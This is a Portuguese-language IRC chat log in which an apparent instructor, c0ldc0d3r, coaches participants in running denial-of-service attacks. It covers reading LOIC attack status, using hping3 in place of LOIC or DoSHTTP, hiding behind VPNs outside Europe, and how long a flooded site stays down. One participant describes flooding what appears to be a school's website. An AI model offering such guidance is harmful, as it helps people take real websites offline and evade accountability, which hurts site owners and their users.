<dgrdfg> por exemplo
<dgrdfg> tenho uma duvida
* emptydev saiu (Ping timeout: 121 seconds)
* MaP05 saiu (Ping timeout: 122 seconds)
* l4m8d4_ (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
<dgrdfg> porque é que com algumas VPN's n consigo aceder a determinados sites
* Funho saiu (Ping timeout: 121 seconds)
<dgrdfg> ou servers
<dgrdfg> e como evitar que isso aconteça
* anarchy saiu (Ping timeout: 121 seconds)
<Grep> c0ldc0d3r, aquele site ping.eu n é melhor o nmap ?
* dgrdfg agora chama-se anarchy
<c0ldc0d3r> isso tem haver com o policy que eles têm contra abusos do serviço..
* AntiSecPT570 (webchat@AN-t76.bhi.3kcki8.IP) entrou em #aula
<tuga> coldcoder, quanto tiveres tempo, se tiveres tempo e se fizeres o favor de me contactar, por favor contacta-me em pvt, obrigado
<c0ldc0d3r> tens que usar outra vpn e de preferência fora da europa.
<Made> amanha há aula?
<anarchy> pois foi o que eu pensei
<anarchy> há que pagar :F
<c0ldc0d3r> Grep, o nmap verifica com o teu ip
* VenusProject saiu (Ping timeout: 121 seconds)
<c0ldc0d3r> o ping.eu não.
<anarchy> mas há vpn's que têm ports fechadas?
<c0ldc0d3r> tuga, ok
* ruicruz saiu (Ping timeout: 127 seconds)
* afk_johnnyPATRAODANET saiu (Ping timeout: 127 seconds)
* kaos saiu (Quit: Page closed)
<Grep> Grep, com o proxychains não, pois não? pelo menos pelo que li :S
* Kondoriano saiu (Ping timeout: 129 seconds)
* aula754 saiu (Ping timeout: 128 seconds)
* sc0rp saiu (Ping timeout: 129 seconds)
<c0ldc0d3r> proxychains poderá resultar...
<c0ldc0d3r> é uma questão de verificar
* w4r10ck saiu (Quit: )
* Hikas saiu (Ping timeout: 132 seconds)
* Caravela|Lulz saiu (Ping timeout: 125 seconds)
* l4m8d4 saiu (Ping timeout: 131 seconds)
* joao_ saiu (Ping timeout: 125 seconds)
* Marmelo saiu (Ping timeout: 122 seconds)
* trolololguy_ saiu (Ping timeout: 129 seconds)
* mitsai saiu (Ping timeout: 125 seconds)
* sh4d0wf40 saiu (Ping timeout: 157 seconds)
* l4m8d4_ agora chama-se l4m8d4
<Grep> tenho feito uns testes, obvio que é mais lento mas tem funcionado... mas é sempre bom haver outras soluções ;) já aprendi kk koisa
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
<emptydev-> Tinhamos ido para a quakenet, tinhamos + gente, e ninguem caia.
<c0ldc0d3r> emptydev-, link.
<c0ldc0d3r> que eu dou ao caravela
<c0ldc0d3r> para por no twitter
<Grep> só uma questão que eu cheguei a meio da aula...
<tuga> c0ldc0d3r, é suposto no LOIC, em baixo em attack status aparecer muitas vezes a dizer failed? pq tenho uns 32.000
<Grep> o hping3 substitui o DoSHTTP e o Loic certo?
<c0ldc0d3r> é, isso significa que o servidor está deixando de responder.
<c0ldc0d3r> Grep, sim.
<An0nf40> tuga tu estás a fazer isso com uma vpn certo?
<tuga> nao lool
<An0nf40> ou estás simplesmente a testar sem nada lol
<c0ldc0d3r> vpn é necessário, visto que somos poucos..
<tuga> mas tipo
<c0ldc0d3r> se fosse tipo 2 mil e tal pessoas a colaborar.. era cagativo usar vpn no meio de tantos ips..
<tuga> eu ponho em perigo outras pessoas?
<c0ldc0d3r> mas como são poucos :\
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
<aaaamitsai> +v +o
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
* Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
<tuga> mas eu nao testei num site do governo
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
* mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
* VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
<An0nf40> não precisa ser do governo lol
<mitsai> +v +o pl
* emptydev- saiu (Ping timeout: 121 seconds)
<An0nf40> eles dão mais importancia a esses...
<tuga> sim, mas acho que uma escola eles nao dao importancia o.O xD
<Grep> lol omg
* DaGun (webchat@AN-a0h.8na.8e30u1.IP) entrou em #aula
* An0nf40 agora chama-se sh4d0wf40
<DaGun> boas, vao por a aula de hoje no pastebin?
<tuga> ao desligar o ataque no LOIC o site volta imediatamente online certo?
<DaGun> e que tava com problemas na net e perdi uma parte
<DaGun> :S
<sh4d0wf40> lolol
<DaGun> xD
<tuga> dagun, ja puseram penso eu
<Made> DaGun http://pastebin.com/TfnBWewg]
<DaGun> só?
<c0ldc0d3r> tuga, sim e não.
* LzKotha (webchat@AN-dft.gs0.hkmcdf.IP) entrou em #aula
<c0ldc0d3r> se o impacto for muito grande.. o site poderá ficar off até haver assistência física.
<DaGun> é que eu isso apanhei xD
* MovingForward (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
<tuga> ah ok
<mitsai> +v +o pls
<Made> Ao usar uma vpn, a vnp não fica com os meus dados no log?

<recording inlog>
end of file